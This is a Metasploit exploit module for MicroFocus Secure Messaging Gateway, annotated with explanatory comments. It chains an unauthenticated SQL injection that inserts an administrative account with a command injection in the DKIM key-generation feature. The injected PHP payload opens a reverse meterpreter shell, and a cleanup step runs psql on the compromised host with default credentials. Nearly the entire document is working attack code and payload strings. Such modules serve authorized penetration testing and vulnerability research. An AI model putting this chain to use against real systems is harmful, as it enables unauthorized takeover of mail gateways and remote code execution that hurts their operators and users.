##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

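# MicroFocus Secure Messaging Gateway RCE (CVE-2018-12464 + CVE-2018-12465).
#
# Exploit chain, as implemented below:
#   1. An unauthenticated stacked SQL injection in /api/1/enginelist.php
#      (execute_query) is used to INSERT an account and UserRole rows
#      (create_user).
#   2. The module logs in as that account (login) to obtain a session cookie.
#   3. An authenticated command injection in the DKIM key-generation feature is
#      reached by saving a domain whose DKIM "Domain" value is a shell
#      substitution wrapping the PHP payload (implant_payload), then triggering
#      manage_domains_dkim_keygen_request.php for that record (exploit).
#   4. On session, the injected rows are removed via psql (on_new_session).
#
# Note: check() is "non-destructive" only in the sense that it runs a SELECT;
# it still sends a real SQL injection payload to the target.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name' => "MicroFocus Secure Messaging Gateway Remote Code Execution",
      'Description' => %q{
        This module exploits a SQL injection and command injection vulnerability in MicroFocus Secure Messaging Gateway.
        An unauthenticated user can execute a terminal command under the context of the web user.

        One of the user supplied parameters of API endpoint is used by the application without input validation and/or parameter binding,
        which leads to SQL injection vulnerability. Successfully exploiting this vulnerability gives a ability to add new user onto system.
        manage_domains_dkim_keygen_request.php endpoint is responsible for executing an operation system command. It's not possible
        to access this endpoint without having a valid session.

        Combining these vulnerabilities gives the opportunity execute operation system commands under the context
        of the web user.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
        ],
      'References' =>
        [
          ['URL', 'https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/'],
          ['CVE', '2018-12464'],
          ['CVE', '2018-12465'],
          ['URL', 'https://support.microfocus.com/kb/doc.php?id=7023132'],
          ['URL', 'https://support.microfocus.com/kb/doc.php?id=7023133']
        ],
      'DefaultOptions' =>
        {
          'Payload' => 'php/meterpreter/reverse_tcp',
          'Encoder' => 'php/base64'
        },
      'Platform' => ['php'],
      'Arch' => ARCH_PHP,
      'Targets' => [[ 'Automatic', { }]],
      'Privileged' => false,
      'DisclosureDate' => "Jun 19 2018",
      'DefaultTarget' => 0
    ))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/'])
      ]
    )
  end

  # Run one SQL statement through the stacked-query injection in
  # /api/1/enginelist.php and return the raw HTTP response.
  #
  # The injected +appkey+ value closes the application's own query (the
  # +')+ prefix) and re-supplies the LEFT JOINs the endpoint expects so that
  # the page still renders; +query+ is then appended as a second statement
  # and the rest of the original query is commented out. The same random
  # padding is placed at both ends of the injection.
  #
  # Fix vs. the previous revision: the request now sends +sql+ explicitly.
  # The old code sent +r+, which only worked because +sql = r+ aliased the
  # same String object and +<<+ mutated it in place.
  #
  # @param query [String] SQL to execute; its result is rendered in the
  #   response body, so a SELECT's output can be read back.
  # @return [Rex::Proto::Http::Response, nil] the response, or nil if the
  #   connection failed.
  def execute_query(query)
    pad = rand_text_alphanumeric(3 + rand(3))
    sql = [
      pad,
      "') LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressPlain ON ScanEngineBindAddressPlain.idScanEngine=ScanEngineProperty.idScanEngine ",
      "LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressSsl ON ScanEngineBindAddressSsl.idScanEngine=ScanEngineProperty.idScanEngine ",
      "LEFT JOIN ScanEngineProperty AS ScanEngineEnableSsl ON ScanEngineEnableSsl.idScanEngine=ScanEngineProperty.idScanEngine; ",
      query,
      "; -- ",
      pad
    ].join

    send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'api', '1', 'enginelist.php'),
      'vars_post' => {
        'appkey' => sql
      }
    )
  end

  # Abort the module run with a generic failure. Always raises.
  def something_went_wrong
    fail_with Failure::Unknown, 'Something went wrong'
  end

  # Probe for the SQL injection by selecting a random numeric marker and
  # looking for it in the response body.
  #
  # @return [Msf::Exploit::CheckCode] Unknown when no response is received,
  #   Safe when the marker is not echoed back with HTTP 200, Vulnerable
  #   otherwise.
  def check
    marker = rand_text_numeric(15..35)
    res = execute_query("SELECT #{marker}")
    unless res
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end

    return CheckCode::Safe unless res.code == 200 && res.body.include?(marker)

    CheckCode::Vulnerable
  end

  # Store the payload on the target by saving a domain record whose DKIM
  # "Domain" field is a shell command substitution running the PHP payload.
  # Sets @domainid and @dkimid (the DbNodeId values returned by the save
  # endpoint) for the trigger step and for cleanup.
  #
  # @param cookie [String] session cookie obtained from #login
  # @raise [Msf::Exploit::Failed] on a bad payload, a non-200 response, or a
  #   response that cannot be parsed.
  def implant_payload(cookie)
    php = payload.encoded
    # The payload sits inside a single-quoted shell argument ("$(php -r '...')").
    # A literal single quote would terminate that quoting and break the command,
    # so refuse such payloads up front instead of failing silently on the target.
    if php.include?("'")
      fail_with Failure::BadConfig, 'Encoded payload contains a single quote, which would break the shell quoting; choose another encoder'
    end

    print_status('Creating a domain record with a malformed DKIM data')
    save_data = [
      {
        :id => 'temp_0',
        :Description => rand_text_alpha(5),
        :DkimList => [
          {
            :Domain => "$(php -r '#{php}')",
            :Selector => '',
            :TempId => 'tempDkim_1'
          }
        ]
      }
    ].to_json

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'admin', 'contents', 'ou', 'manage_domains_save_data.json.php'),
      'cookie' => cookie,
      'vars_get' => {
        'cache' => 0,
      },
      'vars_post' => {
        'StateData' => '[{"ouid":1}]',
        'SaveData' => save_data
      }
    })

    if res && res.code == 200 && res.body.include?('DbNodeId')
      # Instance variables: these ids are needed again in #exploit and #on_new_session.
      # Parse the body once; the original parsed it twice.
      begin
        nodes = JSON.parse(res.body)['Nodes']
        @domainid = nodes[0]['DbNodeId']
        @dkimid = nodes[1]['DbNodeId']
      rescue => e
        fail_with Failure::UnexpectedReply, "Something went horribly wrong while implanting the payload : #{e.message}"
      end
      print_good('Payload is successfully implanted')
    else
      something_went_wrong
    end
  end

  # Insert an account plus two UserRole rows through the SQL injection so
  # that the authenticated command-injection endpoint becomes reachable.
  # Sets @username and @userid for #login and #on_new_session.
  #
  # @raise [Msf::Exploit::Failed] if the account cannot be read back afterwards.
  def create_user
    print_status('Creating a user with appropriate privileges')

    # Instance variables: reused by #login and removed again in #on_new_session.
    @username = rand_text_alpha_lower(5..25)
    @userid = rand_text_numeric(6..8)
    # Column values are positional; they mirror what the application stores for
    # an account with an administrative role (see the pentest.blog reference).
    query = "INSERT INTO account VALUES (#{@userid}, 1, '#{@username}', '0', '', 1,61011);INSERT INTO UserRole VALUES (#{@userid},#{@userid},1),(#{@userid.to_i-1},#{@userid},2)"

    execute_query(query)
    # Verify the row exists by selecting it back through the same injection.
    res = execute_query("SELECT * FROM account WHERE loginname = '#{@username}'")

    if res && res.code == 200 && res.body.include?(@username)
      print_good("User successfully created. Username : #{@username}")
    else
      something_went_wrong
    end
  end

  # Authenticate as the injected account and return the session cookie.
  #
  # A random password is sent; the row written by #create_user is evidently
  # accepted regardless (the module never sets a real credential). If logins
  # start failing after a vendor patch, this is the first place to look.
  #
  # @return [String] cookie header value for subsequent requests
  # @raise [Msf::Exploit::Failed] if the login redirect is not observed.
  def login
    print_status("Authenticating with created user")
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'security', 'securitygate.php'),
      'vars_post' => {
        'username' => @username,
        'password' => rand_text_alpha_lower(5..25),
        'passwordmandatory' => rand_text_alpha_lower(5..25),
        'LimitInterfaceId' => 1
      }
    )

    # A successful login is identified by the UI index path in the body.
    unless res && res.code == 200 && res.body.include?('/ui/default/index.php')
      something_went_wrong
    end

    print_good('Successfully authenticated')
    res.get_cookies
  end

  # Run the full chain: check, create user, login, implant, trigger.
  # The trigger response is not inspected; the session is expected to arrive
  # through the payload handler.
  def exploit
    unless check == CheckCode::Vulnerable
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
    end

    create_user
    cookie = login
    implant_payload(cookie)

    print_status('Triggering an implanted payload')
    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'admin', 'contents', 'ou', 'manage_domains_dkim_keygen_request.php'),
      'cookie' => cookie,
      'vars_get' => {
        'cache' => 0,
      },
      'vars_post' => {
        'DkimRecordId' => @dkimid
      }
    })
  end

  # Remove the rows this module inserted once a session is established.
  #
  # Caveats for operators:
  # - Cleanup runs psql on the target with the default postgres/postgres
  #   credential. If the appliance's database password was changed, the
  #   account, UserRole, Domain and DkimSignature rows will remain and must be
  #   removed by hand.
  # - @domainid and @dkimid come from the target's own JSON response and are
  #   interpolated into a shell command executed on that same target.
  #
  # @param session [Msf::Session] the new session
  def on_new_session(session)
    print_status('Cleaning up...')
    statements = [
      "DELETE FROM account WHERE loginname ='#{@username}';",
      "DELETE FROM UserRole WHERE idaccount = #{@userid};",
      "DELETE FROM Domain WHERE iddomain = #{@domainid};",
      "DELETE FROM DkimSignature WHERE iddkimsignature = #{@dkimid};"
    ].join
    cmd = "PGPASSWORD=postgres psql -U postgres -d SecureGateway -c \"#{statements}\""
    session.shell_command_token(cmd)
  end

end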

# 0day.today [2018-07-26] #